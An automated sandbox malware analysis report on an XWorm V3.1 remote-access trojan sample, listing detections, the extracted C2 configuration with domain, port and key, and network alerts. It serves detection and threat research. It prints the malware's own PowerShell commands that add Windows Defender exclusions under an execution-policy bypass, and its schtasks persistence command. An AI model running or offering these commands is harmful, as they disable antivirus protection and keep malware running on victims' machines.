Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PjGz899RZV.exe

Overview

General Information

Sample name:PjGz899RZV.exe
renamed because original name is a hash value
Original sample name:53db4fa18cd42cdb875538b91c6f500f22727be4cd1d0e0a618159462a8b76ba.exe
Analysis ID:1579065
MD5:2fcde28ef23d2644520ac5aefc123e61
SHA1:ce5c3d508ac86a431619f84d2d10ff149479e8bf
SHA256:53db4fa18cd42cdb875538b91c6f500f22727be4cd1d0e0a618159462a8b76ba
Tags:exeuser-Chainskilabs
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Protects its processes via BreakOnTermination flag
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Schtasks From Env Var Folder
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PjGz899RZV.exe (PID: 4236 cmdline: "C:\Users\user\Desktop\PjGz899RZV.exe" MD5: 2FCDE28EF23D2644520AC5AEFC123E61)
    • powershell.exe (PID: 7160 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 2720 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'PjGz899RZV.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\PjGz899RZV.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 3608 cmdline: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • conhost.exe (PID: 5324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • PjGz899RZV.exe (PID: 3404 cmdline: "C:\Users\user\AppData\Roaming\PjGz899RZV.exe" MD5: 2FCDE28EF23D2644520AC5AEFC123E61)
  • PjGz899RZV.exe (PID: 3052 cmdline: "C:\Users\user\AppData\Roaming\PjGz899RZV.exe" MD5: 2FCDE28EF23D2644520AC5AEFC123E61)
  • PjGz899RZV.exe (PID: 1864 cmdline: C:\Users\user\AppData\Roaming\PjGz899RZV.exe MD5: 2FCDE28EF23D2644520AC5AEFC123E61)
  • PjGz899RZV.exe (PID: 1612 cmdline: C:\Users\user\AppData\Roaming\PjGz899RZV.exe MD5: 2FCDE28EF23D2644520AC5AEFC123E61)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["below-communist.gl.at.ply.gg"], "Port": 38116, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
PjGz899RZV.exeJoeSecurity_XWormYara detected XWormJoe Security
    PjGz899RZV.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x7e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x7f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x8032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x7af8:$cnc4: POST / HTTP/1.1

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Roaming\PjGz899RZV.exeJoeSecurity_XWormYara detected XWormJoe Security
      C:\Users\user\AppData\Roaming\PjGz899RZV.exeMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x7e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x7f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x7af8:$cnc4: POST / HTTP/1.1

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x7c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x7d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x7e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x78f8:$cnc4: POST / HTTP/1.1
        Process Memory Space: PjGz899RZV.exe PID: 4236JoeSecurity_XWormYara detected XWormJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          0.0.PjGz899RZV.exe.e0000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.0.PjGz899RZV.exe.e0000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x7e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x7f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x8032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x7af8:$cnc4: POST / HTTP/1.1

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PjGz899RZV.exe", ParentImage: C:\Users\user\Desktop\PjGz899RZV.exe, ParentProcessId: 4236, ParentProcessName: PjGz899RZV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', ProcessId: 7160, ProcessName: powershell.exe
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PjGz899RZV.exe", ParentImage: C:\Users\user\Desktop\PjGz899RZV.exe, ParentProcessId: 4236, ParentProcessName: PjGz899RZV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', ProcessId: 7160, ProcessName: powershell.exe
            Sigma detected: CurrentVersion Autorun Keys Modification
            Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\PjGz899RZV.exe, ProcessId: 4236, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PjGz899RZV
            Sigma detected: Powershell Defender Exclusion
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PjGz899RZV.exe", ParentImage: C:\Users\user\Desktop\PjGz899RZV.exe, ParentProcessId: 4236, ParentProcessName: PjGz899RZV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', ProcessId: 7160, ProcessName: powershell.exe
            Sigma detected: Startup Folder File Write
            Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\PjGz899RZV.exe, ProcessId: 4236, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PjGz899RZV.lnk
            Sigma detected: Suspicious Schtasks From Env Var Folder
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe", CommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe", CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\PjGz899RZV.exe", ParentImage: C:\Users\user\Desktop\PjGz899RZV.exe, ParentProcessId: 4236, ParentProcessName: PjGz899RZV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "PjGz899RZV" /tr "C:\Users\user\AppData\Roaming\PjGz899RZV.exe", ProcessId: 3608, ProcessName: schtasks.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\PjGz899RZV.exe", ParentImage: C:\Users\user\Desktop\PjGz899RZV.exe, ParentProcessId: 4236, ParentProcessName: PjGz899RZV.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\PjGz899RZV.exe', ProcessId: 7160, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-20T19:02:03.277167+010028531931Malware Command and Control Activity Detected192.168.2.649961147.185.221.2438116TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: PjGz899RZV.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeAvira: detection malicious, Label: TR/Spy.Gen
            Found malware configuration
            Source: PjGz899RZV.exeMalware Configuration Extractor: Xworm {"C2 url": ["below-communist.gl.at.ply.gg"], "Port": 38116, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
            Multi AV Scanner detection for dropped file
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeReversingLabs: Detection: 81%
            Multi AV Scanner detection for submitted file
            Source: PjGz899RZV.exeReversingLabs: Detection: 81%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for dropped file
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: PjGz899RZV.exeJoe Sandbox ML: detected
            Sample uses string decryption to hide its real strings
            Source: PjGz899RZV.exeString decryptor: below-communist.gl.at.ply.gg
            Source: PjGz899RZV.exeString decryptor: 38116
            Source: PjGz899RZV.exeString decryptor: <123456789>
            Source: PjGz899RZV.exeString decryptor: <Xwormmm>
            Source: PjGz899RZV.exeString decryptor: USB.exe
            Source: PjGz899RZV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PjGz899RZV.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49910 -> 147.185.221.24:38116
            Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49961 -> 147.185.221.24:38116
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: below-communist.gl.at.ply.gg
            Source: global trafficTCP traffic: 192.168.2.6:49801 -> 147.185.221.24:38116
            Source: Joe Sandbox ViewIP Address: 147.185.221.24 147.185.221.24
            Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: below-communist.gl.at.ply.gg
            Source: powershell.exe, 00000005.00000002.2333487305.00000204CD186000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
            Source: powershell.exe, 00000008.00000002.2490603239.00000160F7B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
            Source: powershell.exe, 00000008.00000002.2490603239.00000160F7B73000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
            Source: powershell.exe, 00000002.00000002.2231159218.000002A2B0160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2316892887.00000204C4A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000008.00000002.2490281197.00000160F79A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
            Source: powershell.exe, 00000002.00000002.2204739070.000002A2A0319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: PjGz899RZV.exe, 00000000.00000002.3393220395.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2204739070.000002A2A00F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000002.00000002.2204739070.000002A2A0319000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4BB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2204739070.000002A2A00F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2263189252.00000204B4991000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2362621847.0000016080001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000008.00000002.2362621847.0000016080229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2231159218.000002A2B0160000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2316892887.00000204C4A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2456761857.0000016090070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Contains functionality to log keystrokes (.Net Source)
            Source: PjGz899RZV.exe, XLogger.cs.Net Code: KeyboardLayout
            Source: PjGz899RZV.exe.0.dr, XLogger.cs.Net Code: KeyboardLayout

            Operating System Destruction

            barindex
            Protects its processes via BreakOnTermination flag
            Source: C:\Users\user\Desktop\PjGz899RZV.exeProcess information set: 01 00 00 00 Jump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: PjGz899RZV.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.0.PjGz899RZV.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, type: DROPPEDMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD34560E890_2_00007FFD34560E89
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD34569BA20_2_00007FFD34569BA2
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD345608080_2_00007FFD34560808
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD34568DF60_2_00007FFD34568DF6
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD345619590_2_00007FFD34561959
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD345654F20_2_00007FFD345654F2
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD34566AED0_2_00007FFD34566AED
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD345675CD0_2_00007FFD345675CD
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD345659ED0_2_00007FFD345659ED
            Source: C:\Users\user\Desktop\PjGz899RZV.exeCode function: 0_2_00007FFD345685F50_2_00007FFD345685F5
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD3455B9FA2_2_00007FFD3455B9FA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD34622E4F2_2_00007FFD34622E4F
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD34578E2C5_2_00007FFD34578E2C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FFD3457B7FC5_2_00007FFD3457B7FC
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD34579CD88_2_00007FFD34579CD8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFD346430E98_2_00007FFD346430E9
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 15_2_00007FFD34540E8915_2_00007FFD34540E89
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 15_2_00007FFD3454195915_2_00007FFD34541959
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 16_2_00007FFD34540E8916_2_00007FFD34540E89
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 16_2_00007FFD3454195916_2_00007FFD34541959
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 17_2_00007FFD34570E8917_2_00007FFD34570E89
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 17_2_00007FFD3457195917_2_00007FFD34571959
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeCode function: 18_2_00007FFD34560E8918_2_00007FFD34560E89
            Source: PjGz899RZV.exe, 00000000.00000000.2129109978.00000000000EC000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient45.exe4 vs PjGz899RZV.exe
            Source: PjGz899RZV.exeBinary or memory string: OriginalFilenameXClient45.exe4 vs PjGz899RZV.exe
            Source: PjGz899RZV.exe.0.drBinary or memory string: OriginalFilenameXClient45.exe4 vs PjGz899RZV.exe
            Source: PjGz899RZV.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: PjGz899RZV.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.0.PjGz899RZV.exe.e0000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000000.2129079448.00000000000E2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exe, type: DROPPEDMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: PjGz899RZV.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: PjGz899RZV.exe, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: PjGz899RZV.exe, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: PjGz899RZV.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: PjGz899RZV.exe.0.dr, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: PjGz899RZV.exe.0.dr, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: PjGz899RZV.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: PjGz899RZV.exe, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: PjGz899RZV.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: PjGz899RZV.exe.0.dr, ClientSocket.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@17/17@1/1
            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile created: C:\Users\user\AppData\Roaming\PjGz899RZV.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\PjGz899RZV.exeMutant created: NULL
            Source: C:\Users\user\Desktop\PjGz899RZV.exeMutant created: \Sessions\1\BaseNamedObjects\Jc3R9e9dWsfhw7z8
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6672:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5612:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5324:120:WilError_03
            Source: C:\Users\user\Desktop\PjGz899RZV.exeFile created: C:\Users\user\AppData\Local\Temp\Log.tmpJump to behavior
            Source: PjGz899RZV.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: PjGz899RZV.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
